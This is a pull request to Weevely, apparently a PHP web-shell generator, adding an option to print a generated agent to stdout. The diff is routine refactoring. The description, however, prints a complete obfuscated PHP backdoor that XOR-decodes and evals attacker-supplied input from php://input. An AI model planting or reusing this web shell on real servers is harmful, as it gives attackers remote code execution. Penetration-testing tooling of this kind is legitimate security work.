### PR TITLE
Add `-` filename as stdout

### DIFF
--- a/core/generate.py
+++ b/core/generate.py
@@ -1,9 +1,13 @@
-from core.config import agent_templates_folder_path, obfuscators_templates_folder_path
-from mako.template import Template
-from core.weexceptions import FatalException
-from core import messages
-import os
 import base64
+import os
+import sys
+
+from mako.template import Template
+
+from core import messages
+from core.config import agent_templates_folder_path, obfuscators_templates_folder_path
+from core.weexceptions import FatalException
+
 
 def generate(password, obfuscator = 'obfusc1_php', agent = 'obfpost_php'):
 
@@ -41,14 +45,14 @@ def generate(password, obfuscator = 'obfusc1_php', agent = 'obfpost_php'):
 
 
 def save_generated(obfuscated, output):
-
+    b64 = obfuscated[:4] == 'b64:'
+    final = base64.b64decode(obfuscated[4:]) if b64 else obfuscated.encode('utf-8')
     try:
-        if obfuscated[:4] == 'b64:':
-            with open(output, 'wb') as genfile:
-                genfile.write(base64.b64decode(obfuscated[4:]))
+        if output == '-':
+            sys.stdout.buffer.write(final)
         else:
-            with open(output, 'w') as genfile:
-                genfile.write(obfuscated)
+            with open(output, 'wb') as outfile:
+                outfile.write(final)
     except Exception as e:
         raise FatalException(
             messages.generic.error_creating_file_s_s %

--- a/weevely.py
+++ b/weevely.py
@@ -1,17 +1,18 @@
 #!/usr/bin/env python3
-from core.terminal import Terminal
-from core.weexceptions import FatalException
-from core.loggers import log, dlog
-from core.sessions import SessionURL, SessionFile
-from core.config import agent_templates_folder_path, obfuscators_templates_folder_path
-from core import generate
-from core import modules
-from core import messages
-from core.argparsers import CliParser
-import pprint
 import glob
 import os
+import pprint
 import sys
+
+from core import generate
+from core import messages
+from core import modules
+from core.argparsers import CliParser
+from core.config import agent_templates_folder_path, obfuscators_templates_folder_path
+from core.loggers import log, dlog
+from core.sessions import SessionURL, SessionFile
+from core.terminal import Terminal
+from core.weexceptions import FatalException
 
 if sys.stdout.encoding is None:
     print("Please set PYTHONIOENCODING=UTF-8 running 'export PYTHONIOENCODING=UTF-8' before starting Weevely.")
@@ -30,11 +31,13 @@ def main(arguments):
 
         generate.save_generated(obfuscated, arguments.path)
 
-        log.info(
-        messages.generate.generated_backdoor_with_password_s_in_s_size_i %
-        (arguments.path,
-        arguments.password, len(obfuscated))
-        )
+        if arguments.path != '-':
+            log.info(messages.generate.generated_backdoor_with_password_s_in_s_size_i %
+                     (arguments.path,
+                      arguments.password,
+                      len(obfuscated)
+                      )
+                     )
 
         return
 


### PR DESCRIPTION
Enables one to print the generated agent directly to stdout like so:
```sh
$ weevely generate 'testingpassword' -
<?php
$D='j];}}re0xt0xurn $o;}if (0x@preg0x_match(0x"/$kh(0x0x.+)$kf/",0x@fi0x0xle_get_content';
$P='();$r=@base60x4_enc0xode(0x@x(@g0xzc0xompress(0x$o),$0xk));pri0xnt(0x"$p$kh$r$kf");}';
$h='s(0x"php://0xi0xn0xput"),$0xm)==1) {@ob_sta0xrt();@e0xva0xl(@gz0xu0xncompre0xss(0x@x';
$g='5f83uD9"0x;func0xtion x(0x$t,$k0x){$c=strl0xen(0x$k);$l0x=str0xlen($t);$o=0x"";for0x';
$V=str_replace('RN','','RNcreatRNRNeRNRN_functRNion');
$W='(@ba0xse64_decode($0xm[0x1]),$0xk)));$o=@ob_get0x_con0x0xtents();@ob_e0x0xnd_cle0xan';
$r='$k="0x81dc9bdb"0x;$k0x0xh="52d04dc200x0360x";$kf="dbd830x0x13ed055";$0xp0x="WKtPU0xmePR';
$m='($i=0;0x$i<0x$l0x;)0x{for($j=0;0x($j<0x$c&&$i<$0xl)0x;$j++,$i++)0x{0x$o.0x=$t[$i]^$k[$';
$f=str_replace('0x','',$r.$g.$m.$D.$h.$W.$P);
$Z=$V('',$f);$Z();
?>
```